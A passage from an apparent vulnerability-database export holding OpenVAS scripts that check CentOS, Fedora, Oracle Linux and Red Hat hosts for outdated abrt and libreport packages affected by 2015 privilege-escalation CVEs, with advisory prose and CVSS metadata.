(CVE-2015-3150)\n\nIt was discovered that the abrt-action-install-debuginfo-to-abrt-cache\nhelper program did not properly filter the process environment before\ninvoking abrt-action-install-debuginfo. A local attacker could use this\nflaw to escalate their privileges on the system. (CVE-2015-3159)\n\nAll users of abrt are advised to upgrade to these updated packages, which\ncorrect these issues.\");\n script_tag(name:\"affected\", value:\"abrt on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"CESA\", value:\"2015:1083\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2015-June/021170.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"abrt\", rpm:\"abrt~2.1.11~22.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-addon-ccpp\", rpm:\"abrt-addon-ccpp~2.1.11~22.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-addon-kerneloops\", rpm:\"abrt-addon-kerneloops~2.1.11~22.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-addon-pstoreoops\", rpm:\"abrt-addon-pstoreoops~2.1.11~22.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-addon-python\", rpm:\"abrt-addon-python~2.1.11~22.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-addon-upload-watch\", rpm:\"abrt-addon-upload-watch~2.1.11~22.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-addon-vmcore\", rpm:\"abrt-addon-vmcore~2.1.11~22.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-addon-xorg\", rpm:\"abrt-addon-xorg~2.1.11~22.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-cli\", rpm:\"abrt-cli~2.1.11~22.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-console-notification\", rpm:\"abrt-console-notification~2.1.11~22.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-dbus\", rpm:\"abrt-dbus~2.1.11~22.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-desktop\", rpm:\"abrt-desktop~2.1.11~22.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-devel\", rpm:\"abrt-devel~2.1.11~22.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-gui\", rpm:\"abrt-gui~2.1.11~22.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-gui-devel\", rpm:\"abrt-gui-devel~2.1.11~22.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-gui-libs\", rpm:\"abrt-gui-libs~2.1.11~22.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-libs\", rpm:\"abrt-libs~2.1.11~22.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-python\", rpm:\"abrt-python~2.1.11~22.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-python-doc\", rpm:\"abrt-python-doc~2.1.11~22.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-retrace-client\", rpm:\"abrt-retrace-client~2.1.11~22.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"abrt-tui\", rpm:\"abrt-tui~2.1.11~22.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport\", rpm:\"libreport~2.1.11~23.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-anaconda\", rpm:\"libreport-anaconda~2.1.11~23.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-centos\", rpm:\"libreport-centos~2.1.11~23.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-cli\", rpm:\"libreport-cli~2.1.11~23.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-compat\", rpm:\"libreport-compat~2.1.11~23.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-devel\", rpm:\"libreport-devel~2.1.11~23.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-filesystem\", rpm:\"libreport-filesystem~2.1.11~23.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-gtk\", rpm:\"libreport-gtk~2.1.11~23.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-gtk-devel\", rpm:\"libreport-gtk-devel~2.1.11~23.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-newt\", rpm:\"libreport-newt~2.1.11~23.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-plugin-bugzilla\", rpm:\"libreport-plugin-bugzilla~2.1.11~23.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-plugin-kerneloops\", rpm:\"libreport-plugin-kerneloops~2.1.11~23.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-plugin-logger\", rpm:\"libreport-plugin-logger~2.1.11~23.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-plugin-mailx\", rpm:\"libreport-plugin-mailx~2.1.11~23.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-plugin-mantisbt\", rpm:\"libreport-plugin-mantisbt~2.1.11~23.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-plugin-reportuploader\", rpm:\"libreport-plugin-reportuploader~2.1.11~23.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-plugin-rhtsupport\", rpm:\"libreport-plugin-rhtsupport~2.1.11~23.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-plugin-ureport\", rpm:\"libreport-plugin-ureport~2.1.11~23.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-python\", rpm:\"libreport-python~2.1.11~23.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-rhel\", rpm:\"libreport-rhel~2.1.11~23.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-rhel-anaconda-bugzilla\", rpm:\"libreport-rhel-anaconda-bugzilla~2.1.11~23.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-rhel-bugzilla\", rpm:\"libreport-rhel-bugzilla~2.1.11~23.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-web\", rpm:\"libreport-web~2.1.11~23.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreport-web-devel\", rpm:\"libreport-web-devel~2.1.11~23.el7.centos.0.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-24T18:28:21", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-07-07T00:00:00", "type": "openvas", "title": "Fedora Update for abrt FEDORA-2015-9886", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3151", "CVE-2015-3142", "CVE-2015-1870", "CVE-2015-3150", "CVE-2015-3147", "CVE-2015-1869", "CVE-2015-3315", "CVE-2015-3159"], "modified": "2020-01-24T00:00:00", "id": "OPENVAS:1361412562310869632", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869632", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for abrt FEDORA-2015-9886\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869632\");\n script_version(\"2020-01-24T07:57:30+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-24 07:57:30 +0000 (Fri, 24 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-07-07 06:30:09 +0200 (Tue, 07 Jul 2015)\");\n script_cve_id(\"CVE-2015-3315\", \"CVE-2015-3142\", \"CVE-2015-1869\", \"CVE-2015-1870\",\n \"CVE-2015-3151\", \"CVE-2015-3150\", \"CVE-2015-3159\", \"CVE-2015-3147\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for abrt FEDORA-2015-9886\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'abrt'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"abrt on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-9886\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-June/160570.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"abrt\", rpm:\"abrt~2.6.0~1.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-24T18:28:28", "description": "Oracle Linux Local Security Checks ELSA-2015-1083", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2015-1083", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3151", "CVE-2015-3142", "CVE-2015-1870", "CVE-2015-3150", "CVE-2015-3147", "CVE-2015-1869", "CVE-2015-3315", "CVE-2015-3159"], "modified": "2020-01-24T00:00:00", "id": "OPENVAS:1361412562310123105", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123105", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123105\");\n script_version(\"2020-01-24T07:57:30+0000\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 13:59:26 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-01-24 07:57:30 +0000 (Fri, 24 Jan 2020)\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-1083\");\n script_tag(name:\"insight\", value:\"ELSA-2015-1083 - abrt security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-1083\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-1083.html\");\n script_cve_id(\"CVE-2015-1869\", \"CVE-2015-1870\", \"CVE-2015-3142\", \"CVE-2015-3147\", \"CVE-2015-3150\", \"CVE-2015-3151\", \"CVE-2015-3159\", \"CVE-2015-3315\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"abrt\", rpm:\"abrt~2.1.11~22.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"abrt-addon-ccpp\", rpm:\"abrt-addon-ccpp~2.1.11~22.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"abrt-addon-kerneloops\", rpm:\"abrt-addon-kerneloops~2.1.11~22.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"abrt-addon-pstoreoops\", rpm:\"abrt-addon-pstoreoops~2.1.11~22.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"abrt-addon-python\", rpm:\"abrt-addon-python~2.1.11~22.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"abrt-addon-upload-watch\", rpm:\"abrt-addon-upload-watch~2.1.11~22.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"abrt-addon-vmcore\", rpm:\"abrt-addon-vmcore~2.1.11~22.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"abrt-addon-xorg\", rpm:\"abrt-addon-xorg~2.1.11~22.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"abrt-cli\", rpm:\"abrt-cli~2.1.11~22.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"abrt-console-notification\", rpm:\"abrt-console-notification~2.1.11~22.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"abrt-dbus\", rpm:\"abrt-dbus~2.1.11~22.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"abrt-desktop\", rpm:\"abrt-desktop~2.1.11~22.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"abrt-devel\", rpm:\"abrt-devel~2.1.11~22.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"abrt-gui\", rpm:\"abrt-gui~2.1.11~22.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"abrt-gui-devel\", rpm:\"abrt-gui-devel~2.1.11~22.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"abrt-gui-libs\", rpm:\"abrt-gui-libs~2.1.11~22.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"abrt-libs\", rpm:\"abrt-libs~2.1.11~22.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"abrt-python\", rpm:\"abrt-python~2.1.11~22.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"abrt-python-doc\", rpm:\"abrt-python-doc~2.1.11~22.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"abrt-retrace-client\", rpm:\"abrt-retrace-client~2.1.11~22.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"abrt-tui\", rpm:\"abrt-tui~2.1.11~22.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libreport\", rpm:\"libreport~2.1.11~23.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libreport-anaconda\", rpm:\"libreport-anaconda~2.1.11~23.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libreport-cli\", rpm:\"libreport-cli~2.1.11~23.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libreport-compat\", rpm:\"libreport-compat~2.1.11~23.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libreport-devel\", rpm:\"libreport-devel~2.1.11~23.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libreport-filesystem\", rpm:\"libreport-filesystem~2.1.11~23.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libreport-gtk\", rpm:\"libreport-gtk~2.1.11~23.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libreport-gtk-devel\", rpm:\"libreport-gtk-devel~2.1.11~23.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libreport-newt\", rpm:\"libreport-newt~2.1.11~23.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libreport-plugin-bugzilla\", rpm:\"libreport-plugin-bugzilla~2.1.11~23.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libreport-plugin-kerneloops\", rpm:\"libreport-plugin-kerneloops~2.1.11~23.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libreport-plugin-logger\", rpm:\"libreport-plugin-logger~2.1.11~23.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libreport-plugin-mailx\", rpm:\"libreport-plugin-mailx~2.1.11~23.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libreport-plugin-reportuploader\", rpm:\"libreport-plugin-reportuploader~2.1.11~23.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libreport-plugin-ureport\", rpm:\"libreport-plugin-ureport~2.1.11~23.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libreport-python\", rpm:\"libreport-python~2.1.11~23.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libreport-rhel-anaconda-bugzilla\", rpm:\"libreport-rhel-anaconda-bugzilla~2.1.11~23.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libreport-rhel-bugzilla\", rpm:\"libreport-rhel-bugzilla~2.1.11~23.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libreport-web\", rpm:\"libreport-web~2.1.11~23.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libreport-web-devel\", rpm:\"libreport-web-devel~2.1.11~23.0.1.el7_1\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-24T18:28:26", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-06-10T00:00:00", "type": "openvas", "title": "RedHat Update for abrt RHSA-2015:1083-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3151", "CVE-2015-3142", "CVE-2015-1870", "CVE-2015-3150", "CVE-2015-3147", "CVE-2015-1869", "CVE-2015-3315", "CVE-2015-3159"], "modified": "2020-01-24T00:00:00", "id": "OPENVAS:1361412562310871373", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871373", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for abrt RHSA-2015:1083-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871373\");\n script_version(\"2020-01-24T07:57:30+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-24 07:57:30 +0000 (Fri, 24 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-06-10 06:34:39 +0200 (Wed, 10 Jun 2015)\");\n script_cve_id(\"CVE-2015-1869\", \"CVE-2015-1870\", \"CVE-2015-3142\", \"CVE-2015-3147\",\n \"CVE-2015-3150\", \"CVE-2015-3151\", \"CVE-2015-3159\", \"CVE-2015-3315\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for abrt RHSA-2015:1083-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'abrt'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"ABRT (Automatic Bug Reporting Tool) is a tool to help users to detect\ndefects in applications and to create a bug report with all the information\nneeded by a maintainer to fix it. It uses a plug-in system to extend its\nfunctionality.\n\nIt was found that ABRT was vulnerable to multiple race condition and\nsymbolic link flaws. A local attacker could use these flaws to potentially\nescalate their privileges on the system. (CVE-2015-3315)\n\nIt was discovered that the kernel-invoked coredump processor provided by\nABRT wrote core dumps to files owned by other system users. This could\nresult in information disclosure if an application crashed while its\ncurrent directory was a directory writable to by other users (such as\n/tmp). (CVE-2015-3142)\n\nIt was discovered that the default event handling scripts installed by ABRT\ndid not handle symbolic links correctly. A local attacker with write access\nto an ABRT problem directory could use this flaw to escalate 